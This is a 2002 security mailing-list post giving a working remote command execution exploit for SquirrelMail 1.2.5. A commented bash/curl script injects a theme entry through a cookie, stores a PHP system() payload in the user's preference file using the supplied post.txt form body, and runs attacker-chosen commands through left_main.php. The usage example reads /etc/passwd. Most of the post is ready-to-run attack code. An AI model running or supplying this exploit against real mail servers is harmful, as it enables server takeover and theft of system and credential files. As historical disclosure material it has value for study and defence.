squirrelmail 1.2.5 email user can execute command

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Wed Mar 27 2002 - 17:16:23 PST


    
    An authenticated webmail user can append entries to the $theme array
    through cookies (the THEME cookie in the script below), pointing a
    theme's PATH at their own preference file (data/USERNAME.pref). The
    options form in post.txt then saves a `<? system($cmdd); ?>` fragment
    into that file via the new_show_num field, and a request to
    left_main.php?cmdd=... makes the server run the command.
    
    ---------------- start sq125x ---------------------
    
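    #!/usr/bin/env bash
    #
    # squirrelmail-1.2.5 remote execution by pokleyzz
    # http://www.inetd-secure.net
    #
    # usage   : ./sq125x themecount username password url command
    # example : ./sq125x 2 pokley 123456 http://mail.pokleyzz.my/mail "cat /etc/passwd"
    #
    # curl can be found at http://curl.haxx.se/libcurl/
    #
    # What the script does (only what is visible here): a theme[] entry is
    # appended through a cookie so that theme[themecount][PATH] points at
    # the user's own preference file (../data/USERNAME.pref). The options
    # form in post.txt (expected in the current directory) selects that
    # theme and stores a PHP fragment in the new_show_num preference. A
    # request to left_main.php with the command in the cmdd query parameter
    # then returns the command output. The login + options round trip is
    # done twice, as in the original; the original gives no reason for this
    # (presumably the first pass writes the pref file and the second makes
    # the theme load it -- unverified).
    #
    # NOTE: username, password and command are taken from argv and passed
    # to curl on its command line, so they are visible to every local user
    # via ps while the script runs. Run it only from a host you trust.
    #
    # Changes from the original: all expansions quoted; temp files come
    # from mktemp and are removed by an EXIT trap (the original wrote to
    # the fixed path /tmp/.tmp, which a local user could pre-create as a
    # symlink); the username is no longer interpolated into a sed pattern;
    # the command is fully percent-encoded instead of only spaces; a login
    # that yields no session cookie aborts instead of continuing blindly.

    set -euo pipefail
    export PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin"
    # byte-wise string handling so urlencode sees single bytes
    LC_ALL=C
    export LC_ALL

    # curl binary; may be overridden from the environment as in the original
    # (CURL=/usr/bin/curl). Resolved through PATH instead of a fixed path.
    CURL="${CURL:-curl}"
    # options-form template shipped with the exploit (see post.txt)
    POST_TEMPLATE="post.txt"
    # temp file holding the filled-in form body; removed by cleanup()
    form_file=""

    die() { printf 'sq125x: %s\n' "$*" >&2; exit 1; }

    usage() {
      printf 'usage: %s themecount username password url command\n' "${0##*/}" >&2
      exit 2
    }

    cleanup() {
      if [[ -n "$form_file" ]]; then
        rm -f -- "$form_file"
      fi
    }

    #######################################
    # Percent-encode every byte of a string except the RFC 3986 unreserved
    # set, writing the result to stdout.
    # Arguments: $1 - string to encode
    # Why: the original only turned spaces into %20 (sed 's/ /%20/g'), so a
    # command containing '&', '#', '+' or '%' was cut or altered server-side.
    #######################################
    urlencode() {
      local str=$1 out="" ch i
      for (( i = 0; i < ${#str}; i++ )); do
        ch=${str:i:1}
        case "$ch" in
          [A-Za-z0-9._~-]) out+=$ch ;;
          *) printf -v ch '%%%02X' "'$ch"; out+=$ch ;;
        esac
      done
      printf '%s' "$out"
    }

    #######################################
    # Print the cookies a response set, in the form curl -b accepts.
    # Arguments: $1 - file with the response headers (curl -D)
    # Every "Set-Cookie: NAME=VALUE; ..." line contributes its second field
    # ("NAME=VALUE;"), concatenated with no separator, exactly as the
    # original grep|awk|printf pipeline did. Header names are matched
    # case-insensitively (the original's grep was case-sensitive).
    #######################################
    session_cookies() {
      awk 'tolower($1) == "set-cookie:" { printf "%s", $2 }' "$1"
    }

    #######################################
    # Log in with the theme-injecting cookie attached and print the cookie
    # string for the following requests: session cookies + theme cookie.
    # Arguments: $1 - theme cookie, $2 - username, $3 - password, $4 - base URL
    # Exits via die() if curl fails or no Set-Cookie header came back.
    #######################################
    login() {
      local theme=$1 user=$2 pass=$3 base=$4 headers cookies
      headers=$(mktemp) || die "mktemp failed"
      "$CURL" --silent --show-error -b "$theme" \
        -d "login_username=$(urlencode "$user")" \
        -d "secretkey=$(urlencode "$pass")" \
        -d js_autodetect_results=0 -d just_logged_in=1 \
        -D "$headers" -o /dev/null "$base/src/redirect.php" \
        || { rm -f -- "$headers"; die "login request to $base failed"; }
      cookies=$(session_cookies "$headers")
      rm -f -- "$headers"
      [[ -n "$cookies" ]] \
        || die "login returned no session cookie (wrong username, password or URL?)"
      printf '%s %s' "$cookies" "$theme"
    }

    #######################################
    # Submit the filled-in options form; the response body is discarded.
    # Arguments: $1 - cookie string, $2 - form body file, $3 - base URL
    #######################################
    submit_options() {
      local cookies=$1 body=$2 base=$3
      "$CURL" --silent --show-error -b "$cookies" -d "@$body" \
        -o /dev/null "$base/src/options.php" \
        || die "options request to $base failed"
    }

    main() {
      (( $# == 5 )) || usage
      local theme_count=$1 user=$2 pass=$3 base=$4 command=$5
      local theme template cookies

      [[ "$theme_count" =~ ^[0-9]+$ ]] || die "themecount must be a non-negative integer"
      command -v "$CURL" >/dev/null 2>&1 || die "curl not found (set CURL=/path/to/curl)"
      [[ -r "$POST_TEMPLATE" ]] || die "$POST_TEMPLATE not readable in the current directory"
      # tolerate a trailing slash on the URL (the original would produce //src)
      base=${base%/}

      # the injected theme entry: PATH is the user's own pref file
      theme="theme[${theme_count}][PATH]=../data/${user}.pref; theme[${theme_count}][NAME]=testing"

      # fill in the form template: "pokley" in post.txt is the placeholder
      # for the username inside the URL-encoded new_chosen_theme path
      form_file=$(mktemp) || die "mktemp failed"
      trap cleanup EXIT
      template=$(<"$POST_TEMPLATE")
      printf '%s' "${template//pokley/$(urlencode "$user")}" >"$form_file"

      # step 1
      cookies=$(login "$theme" "$user" "$pass" "$base")
      submit_options "$cookies" "$form_file" "$base"

      # step 2 (same round trip again; see header comment)
      sleep 5
      cookies=$(login "$theme" "$user" "$pass" "$base")
      submit_options "$cookies" "$form_file" "$base"

      # run the command; the response body (command output) goes to stdout
      "$CURL" --silent --show-error -b "$cookies" \
        "$base/src/left_main.php?cmdd=$(urlencode "$command")" \
        || die "command request to $base failed"
      "$CURL" --silent --show-error -b "$cookies" -o /dev/null "$base/src/signout.php" \
        || true  # best effort: the command already ran, signout failing is not fatal
    }

    main "$@"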
    -------------- end sq125x ----------------------
    
    -------------- start post.txt --------------------
    optpage=display&optmode=submit&new_chosen_the
    me=..%2Fdata%
    2Fpokley.pref&new_custom_css=none&new_languag
    e=&new_javascript_setting=2&new_js_autodetect_re
    sults=1&new_show_num=15%0D%0A%3C%3F+%
    0D%0Asystem%28%24cmdd%29%3B+%0D%0A%
    3F%
    3E&new_alt_index_colors=1&new_page_selector=1&
    new_page_selector_max=10&new_wrap_at=86&new
    _editor_size=76&new_location_of_buttons=between&
    new_use_javascript_addr_book=0&new_show_html_
    default=0&new_include_self_reply_all=1&new_show_
    xmailer_default=0&new_attachment_common_show_
    images=0&new_pf_subtle_link=1&new_pf_cleandispl
    ay=0&new_mdn_user_support=1&new_compose_ne
    w_win=0&delete_move_next_bi=on&delete_move_ne
    xt_formATbottomi=on&submit_display=Submit
    ----------------------end post.txt --------------------------
    


